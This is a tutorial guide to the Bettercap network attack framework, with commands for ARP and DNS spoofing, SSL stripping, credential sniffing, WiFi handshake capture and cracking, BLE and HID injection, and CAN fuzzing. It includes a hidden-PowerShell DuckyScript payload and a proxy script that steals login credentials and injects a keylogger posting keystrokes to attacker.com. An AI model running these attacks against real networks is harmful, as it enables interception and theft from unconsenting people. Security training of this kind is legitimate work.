Bettercap: A Comprehensive Guide to Network Security Assessment and Penetration Testing

Master Bettercap for recon, MITM, and Wi-Fi attacks with step-by-step commands and real-world cybersecurity examples.

Introduction

Bettercap represents the state-of-the-art in network security assessment frameworks. Engineered in Go, this sophisticated, open-source platform provides security professionals with an enterprise-grade toolkit for comprehensive network reconnaissance, vulnerability assessment, and penetration testing. Its modular architecture delivers unprecedented flexibility across the full spectrum of network protocols and technologies, from traditional IPv4/IPv6 networks to wireless communications including WiFi, Bluetooth Low Energy (BLE), and Human Interface Devices (HID).

This technical analysis offers security practitioners a methodical examination of Bettercap's capabilities, complete with detailed command syntax, parameter descriptions, operational workflows, and attack methodologies for conducting authorized security assessments in enterprise environments.

Key Features and Technical Specifications

Bettercap's architectural framework encompasses multiple security domains with enterprise-level capabilities:

WiFi Network Security Assessment: Advanced reconnaissance, client enumeration, deauthentication vector implementation, PMKID acquisition via clientless association, and automated WPA/WPA2 handshake interception
Bluetooth Low Energy (BLE) Security Analysis: Device enumeration, service discovery, characteristic mapping, and read/write operations for IoT security assessment
Radio Frequency (RF) Attack Surface Evaluation: 2.4GHz wireless device identification and MouseJacking attack execution with HID frame injection capabilities including DuckyScript compatibility
Network Topology Discovery: Active and passive host identification with vendor fingerprinting, OS detection, and service enumeration
Layer 2/3 Traffic Manipulation: Comprehensive protocol spoofing (ARP, DNS, DHCPv6, NDP) for man-in-the-middle assessment across dual-stack IPv4/IPv6 network environments
Multi-layer Proxy Implementation: Packet-level, TCP stream, and application layer (HTTP/HTTPS) proxy functionality with JavaScript-based traffic manipulation and inspection
Protocol Analysis Engine: Deep packet inspection for credential extraction, protocol compliance verification, and fuzzing operations
Service Enumeration: High-throughput port scanning with service identification
Automotive Security: CAN-bus monitoring, diagnostic frame injection, custom DBC implementation, and OBD2 protocol analysis
Orchestration Interface: RESTful API architecture with WebSocket-based event notification for enterprise security integration
Visualization Layer: Browser-based interface for operational monitoring and control

Installation

Installing Bettercap is straightforward on most Linux distributions:

sudo apt install bettercap

For other platforms or installation methods, refer to the official documentation.

Basic Usage

Starting Bettercap

To launch Bettercap with default settings:

sudo bettercap

To specify a network interface:

sudo bettercap -iface eth0

To view available options:

sudo bettercap -h

The Bettercap Console

Once launched, Bettercap presents an interactive console. Here are essential commands to get started:

> help                # Display general help
> help <module>       # Show help for a specific module (e.g., help net.probe)
> quit                # Exit Bettercap

Network Reconnaissance Methodology

Bettercap implements sophisticated network discovery protocols designed to enumerate and profile network assets with minimal footprint. Proper reconnaissance forms the foundation of effective security assessment by establishing a comprehensive asset inventory.

Host Discovery Protocol

The network reconnaissance module employs multiple discovery vectors:

> net.probe on

This command initiates the active reconnaissance protocol, which performs:

ARP Discovery: Broadcast Address Resolution Protocol queries to identify local network hosts
mDNS Enumeration: Multicast DNS probing for service discovery
NBNS Queries: NetBIOS Name Service requests for legacy Windows host identification
UPNP Detection: Universal Plug and Play discovery to identify network devices with UPnP services enabled

The net.probe module automatically initiates the net.recon component, which maintains an active host inventory with continuous updates as new devices join the network.

To display the current reconnaissance data:

> net.show

The output provides tabular asset intelligence including:

MAC address (with vendor identification)
IPv4/IPv6 addressing
Host metadata (when available)
Last seen timestamp

Passive Reconnaissance Configuration

For environments requiring non-intrusive discovery:

> set net.probe.mdns false
> set net.probe.upnp false
> set net.probe.nbns false
> set net.probe.throttle 10
> net.probe on

This configuration disables active service discovery protocols and implements rate limiting to minimize network impact during assessment.

Man-in-the-Middle Attack Vectors

Bettercap provides enterprise-grade traffic interception capabilities through multiple attack vectors. These techniques allow security practitioners to assess an organization's resilience against traffic manipulation threats.

ARP Spoofing: Layer 2 Traffic Interception

Address Resolution Protocol (ARP) spoofing manipulates the ARP cache of network devices to redirect traffic flow. By falsifying MAC-to-IP address mappings, an attacker can position themselves between communication endpoints.

Technical Implementation:

> arp.spoof.fullduplex true       # Enable bidirectional interception
> arp.spoof.targets 192.168.1.10  # Target specific endpoint (omit for network-wide)
> arp.spoof on                    # Initiate ARP cache poisoning

Parameter Analysis:

fullduplex: When enabled, intercepts both directions of traffic flow (target↔gateway and gateway↔target)
targets: Specifies victim IP addresses (comma-separated for multiple targets)
Additional parameters include internal (spoof within target subnet) and whitelist (exclude specific hosts)

Detection Countermeasures: This attack may trigger security controls including:

Static ARP entries
ARP inspection mechanisms
Network IDS/IPS alerts

DNS Spoofing: Domain Resolution Hijacking

DNS spoofing intercepts and modifies Domain Name System responses, allowing redirection of legitimate domain requests to attacker-controlled resources.

> set dns.spoof.domains *.company.com,*.org,finance.target.com
> set dns.spoof.address 192.168.1.100
> dns.spoof on

Technical Details:

Requires active ARP spoofing to intercept DNS queries
The domains parameter accepts wildcards and comma-separated values
address specifies the IP where matching domains will be redirected
Advanced configuration allows for domain-specific redirection:

> set dns.spoof.all true          # Redirect all DNS queries (high impact)
> set dns.spoof.hosts file.hosts  # Load mappings from hosts file

HTTPS Traffic Analysis

When combined with a properly configured certificate authority, Bettercap can decrypt and analyze HTTPS traffic:

> set https.proxy.address 0.0.0.0
> set https.proxy.port 8443
> set https.proxy.certificate cert.pem
> set https.proxy.key key.pem
> https.proxy on

Bettercap can generate self-signed certificates for testing environments:

> https.proxy.certificate generate  # Create temporary testing certificates

IPv6-Specific Attack Vectors

For dual-stack environments, Bettercap provides specialized IPv6 attack modules:

> ndp.spoof on                     # IPv6 Neighbor Discovery Protocol spoofing
> dhcp6.spoof on                   # DHCPv6 spoofing for prefix delegation hijacking

These attacks enable traffic interception in networks that have implemented IPv6 transition mechanisms.

Advanced Traffic Analysis Framework

With traffic successfully intercepted, Bettercap's traffic analysis engine enables in-depth packet inspection, pattern matching, and data extraction.

Protocol Analyzer Implementation

> net.sniff on                           # Activate packet capture engine

Additional configuration parameters enhance analytical capabilities:

> set net.sniff.verbose false            # Suppress metadata for cleaner output
> set net.sniff.local true               # Include locally generated packets
> set net.sniff.filter tcp port 80       # Apply BPF filter for HTTP traffic
> set net.sniff.regexp '.*password=.*'   # Regular expression pattern matching
> set net.sniff.output captured.pcap     # Packet capture storage

Credential Harvesting Capabilities

Bettercap's pattern-matching engine automatically identifies authentication data across common protocols:

HTTP Basic/Digest Authentication
HTML Form Submissions
FTP Credentials
SMTP/POP3/IMAP Authentication
NTLM/Kerberos Authentication Tokens
Database Connection Strings

The built-in parsers transmit detected credentials to the event notification system:

> events.stream on                       # Enable real-time event monitoring
> set events.stream.output events.log    # Record events to log file

SSL Strip Implementation

For assessment of SSL downgrade vulnerabilities:

> set http.proxy.sslstrip true           # Enable SSL stripping
> http.proxy on                          # Activate HTTP proxy with stripping

This technique attempts to intercept HTTPS requests and rewrite them as HTTP, testing client-side enforcement of encryption.

WiFi Security Assessment Framework

Bettercap incorporates comprehensive wireless network assessment capabilities, allowing security professionals to evaluate WiFi infrastructure for vulnerabilities and misconfigurations.

Monitor Mode Configuration

Prior to wireless assessment, the interface must be configured for radio frequency monitoring:

sudo airmon-ng start wlan0   # External utility to enable monitor mode

Alternatively, internal configuration can be used:

> wifi.recon.channel clear   # Remove channel restrictions
> set wifi.interface wlan0   # Specify interface for monitoring

Wireless Network Reconnaissance

The WiFi reconnaissance module provides detailed enumeration of available wireless networks:

> set wifi.interface wlan0mon    # Specify monitor mode interface
> wifi.recon on                  # Initiate wireless scanning

To display discovered wireless networks with full technical specifications:

> wifi.show

The output contains critical security parameters:

BSSID (MAC address) of access points
ESSID (network name)
Security protocols implemented (Open, WEP, WPA, WPA2, WPA3)
Signal strength metrics (RSSI values)
Channel assignment and width
Supported data rates
Client associations

Deauthentication Attack Vector

The deauthentication attack forces client disconnection from wireless networks, enabling capture of reconnection handshakes and assessment of denial-of-service resilience:

> wifi.deauth 00:11:22:33:44:55        # Target specific access point

To launch a client-specific deauthentication:

> wifi.deauth 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF  # Target specific client

Technical Details:

Transmits 802.11 deauthentication frames to specified targets
Requires no prior authentication to the network
Can be used to disconnect all clients (flood mode) or specific devices
Primarily used to force WPA/WPA2 handshake re-authentication

WPA/WPA2 Handshake Acquisition

To capture authentication handshakes for offline cryptanalysis:

> set wifi.interface wlan0mon
> set wifi.handshake.file /path/to/capture.pcap   # Specify capture destination
> wifi.recon on
> wifi.deauth 00:11:22:33:44:55                   # Force reauthentication

The system will automatically detect and record 4-way handshakes that contain the PMK (Pairwise Master Key) verification data required for offline password evaluation.

PMKID Attack Implementation

For networks supporting Robust Security Network (RSN), the PMKID attack can extract authentication data without client interaction:

> set wifi.interface wlan0mon
> set wifi.handshake.file /path/to/pmkid.pcap
> wifi.assoc 00:11:22:33:44:55        # Send association request to AP

This technique leverages a vulnerability in the RSN authentication mechanism, transmitting an association request that causes the access point to respond with the PMKID, which can then be subjected to offline analysis.

Handshake Cryptanalysis Preparation

After acquisition, handshake data must be converted for analysis with cryptanalysis tools:

sudo apt install hcxtools
hcxpcapngtool -o hashformat.22000 capture.pcap
hashcat -m 22000 hashformat.22000 /path/to/wordlist.txt

The conversion process extracts the cryptographic material from the captured packets and formats it for compatibility with password recovery tools.

Bluetooth Low Energy Security Analysis

Bettercap provides sophisticated Bluetooth Low Energy (BLE) assessment capabilities that enable security professionals to evaluate IoT device implementations and identify potential vulnerabilities in the BLE protocol stack.

BLE Device Discovery

To initiate Bluetooth Low Energy reconnaissance:

> ble.recon on                 # Activate BLE scanning module

This command activates the BLE scanning module, which:

Identifies advertising BLE peripherals within range
Captures device metadata including manufacturer data
Logs signal strength information for proximity estimation
Records advertised service UUIDs

To display discovered devices with technical specifications:

> ble.show                     # Display enumerated BLE devices

The output provides a comprehensive inventory of BLE devices including:

Device MAC addresses
Advertised device names
RSSI signal metrics
Manufacturer-specific data fields
Services advertised in scan response packets

BLE Service Enumeration

For identified devices, the enumeration module provides detailed service mapping:

> ble.enum AA:BB:CC:DD:EE:FF   # Enumerate services and characteristics

This process interrogates the GATT (Generic Attribute Profile) database to:

Discover all available services
Enumerate characteristics within each service
Identify readable/writable characteristics
Map notification-capable endpoints
Determine authentication requirements

BLE Data Exfiltration

To extract data from readable characteristics:

> ble.read AA:BB:CC:DD:EE:FF 1234  # Read characteristic with handle 0x1234

For devices with sensitive data exposed via readable characteristics, this technique can demonstrate potential data leakage vulnerabilities.

BLE Command Injection Assessment

To test for insecure write permissions:

> ble.write AA:BB:CC:DD:EE:FF 1234 0102030405  # Write hex data to characteristic

This operation evaluates if unauthenticated writes are permitted to characteristics that should require proper authentication, potentially revealing command injection vulnerabilities in the target device.

HID Radio Frequency Attack Framework

Bettercap incorporates specialized modules for assessing the security of wireless Human Interface Devices operating in the 2.4GHz spectrum. These capabilities enable security professionals to evaluate vulnerabilities in wireless keyboards, mice, and presentation devices.

Wireless HID Reconnaissance

To initiate scanning for vulnerable HID devices:

> hid.recon on                 # Begin scanning for 2.4GHz HID devices

This command activates the HID receiver, which:

Monitors the 2.4GHz spectrum for HID transmissions
Identifies vulnerable device signatures
Captures device addressing information
Logs signal characteristics and timing patterns

To display discovered HID devices:

> hid.show                     # List identified wireless HID devices

MouseJacking Attack Vector

The MouseJacking attack targets vulnerabilities in non-Bluetooth wireless input devices that fail to properly encrypt or authenticate transmitted commands:

> hid.sniff on                 # Capture legitimate HID frames

After identifying target devices, arbitrary commands can be injected:

> set hid.run calc.exe         # Define command to execute
> hid.inject -1                # Inject command to all detected devices

For targeted injection:

> hid.inject 00:11:22:33:44:55 # Inject command to specific device

DuckyScript Execution

For more sophisticated attack sequences, Bettercap supports the DuckyScript language:

> set hid.script /path/to/payload.duck  # Load DuckyScript payload
> hid.inject 00:11:22:33:44:55          # Execute script against target

Example DuckyScript payload:

DELAY 500
GUI r
DELAY 200
STRING powershell -w hidden -e <base64-encoded-command>
ENTER

This attack vector demonstrates the risk posed by wireless HID devices that lack proper encryption and authentication, potentially allowing unauthorized command execution on connected systems.

Web Application Assessment Framework

Bettercap provides sophisticated proxy capabilities designed for web application security assessment. These components enable security professionals to intercept, analyze, and modify HTTP and HTTPS traffic to evaluate web application security posture.

HTTP Proxy Implementation

To configure and activate the HTTP proxy module:

> set http.proxy.address 0.0.0.0         # Interface binding (all interfaces)
> set http.proxy.port 8080               # TCP port for proxy service
> http.proxy on                          # Initialize HTTP proxy

Additional configuration parameters enhance assessment capabilities:

> set http.proxy.sslstrip true           # Enable SSL downgrade attacks
> set http.proxy.injectjs /path/to/payload.js  # JavaScript injection
> set http.proxy.injectcss /path/to/style.css  # CSS injection

HTTPS Interception Framework

For secure traffic analysis, the HTTPS proxy provides TLS interception:

> set https.proxy.address 0.0.0.0        # Interface binding
> set https.proxy.port 8443              # TLS port for proxy service
> https.proxy on                         # Initialize HTTPS proxy

Certificate management options:

> https.proxy.certificate generate       # Generate ephemeral certificates

For enterprise environments with PKI infrastructure:

> set https.proxy.certificate /path/to/cert.pem  # Custom certificate
> set https.proxy.key /path/to/key.pem           # Private key

JavaScript Module Development

The proxy architecture supports custom JavaScript modules for advanced traffic manipulation:

> set http.proxy.script /path/to/module.js

Example JavaScript interceptor module:

/**
 * HTTP Request/Response manipulation module
 * This demonstrates how to modify authentication requests
 */
function onRequest(req, res) {
    if (req.Path.indexOf('/login') !== -1) {
        console.log('[+] Detected authentication attempt');
        console.log('    Username: ' + req.Body.match(/username=([^&]*)/)[1]);
        console.log('    Password: ' + req.Body.match(/password=([^&]*)/)[1]);

        // Request manipulation example: Force specific credentials
        req.Body = req.Body.replace(/(password=)([^&]*)/, '$1compromised');
    }
    return req, res;
}

function onResponse(req, res) {
    if (req.Path.indexOf('/login') !== -1) {
        // Response manipulation example: Inject keylogger
        if (res.ContentType.indexOf('text/html') !== -1) {
            res.Body = res.Body.replace(
                '</head>',
                '<script>document.addEventListener("keypress", function(e) { ' +
                'fetch("http://attacker.com/log?k=" + e.key); });</script></head>'
            );
        }
    }
    return req, res;
}

HTTP/HTTPS Server Module

The server module provides a customizable web server for phishing assessment and client-side attack simulation:

> set https.server.address 0.0.0.0       # Interface binding
> set https.server.port 443              # Service port
> set https.server.path /path/to/webroot # Document root
> https.server on                        # Activate HTTPS server

For phishing scenario evaluation:

> set https.server.template portal       # Load predefined template

This module allows security teams to assess employee susceptibility to phishing attacks and evaluate the effectiveness of security awareness programs.

Automotive Security Assessment

Bettercap incorporates specialized modules for Controller Area Network (CAN) bus analysis, enabling security professionals to evaluate automotive network security.

CAN Bus Interface Configuration

To initialize the CAN bus interface:

> set can.interface vcan0           # Specify virtual or physical CAN interface
> can.reconnect                     # Establish connection to CAN bus

For hardware interfaces:

> set can.interface can0            # Physical CAN interface
> set can.bitrate 500000            # Set appropriate bitrate (typically 500kbps)

CAN Bus Traffic Analysis

To monitor raw CAN bus traffic:

> can.sniff on                      # Begin capturing CAN frames

This command initiates the CAN bus analyzer, which:

Captures all CAN frames on the specified interface
Displays frame ID, data length, and payload
Calculates bus utilization metrics
Identifies periodic message patterns

Diagnostic Protocol Analysis

For vehicles supporting standard OBD-II protocols:

> set can.obd.protocol auto         # Auto-detect OBD protocol
> can.obd.list                      # Display available PIDs
> can.obd.get rpm                   # Query specific parameter (RPM)

To query multiple parameters:

> can.obd.get rpm,speed,temp        # Query multiple parameters

Custom DBC File Integration

For comprehensive signal decoding:

> set can.dbc.file vehicle.dbc      # Load vehicle-specific DBC
> can.dbc.view                      # List available signals
> can.dbc.monitor engine_speed      # Monitor specific signal

This functionality leverages the vehicle's DBC (Database CAN) file to decode raw CAN messages into meaningful engineering values and signals.

CAN Bus Fuzzing

To perform security assessment of CAN networks:

> set can.fuzzer.id 0x7DF           # Target specific CAN ID
> set can.fuzzer.data "\x02\x01\x00\x00\x00\x00\x00\x00"  # Base frame
> can.fuzz.sequential 3,0xFF        # Sequential fuzz of byte 3

Alternative fuzzing strategies:

> can.fuzz.random 0,7               # Random payload fuzzing

This technique allows security professionals to identify potential vulnerabilities in vehicle systems that might accept malformed CAN messages.

Conclusion

Bettercap represents one of the most comprehensive network security testing frameworks available today. Its versatility across various network protocols and technologies makes it an invaluable tool for security professionals. By understanding its capabilities and commands, security researchers can effectively assess network security postures and identify potential vulnerabilities before malicious actors can exploit them.

Through responsible use and continuous learning, Bettercap can significantly enhance your security testing methodology and provide deeper insights into network security challenges.

References

Official Bettercap Documentation: https://www.bettercap.org/docs/
GitHub Repository: https://github.com/bettercap/bettercap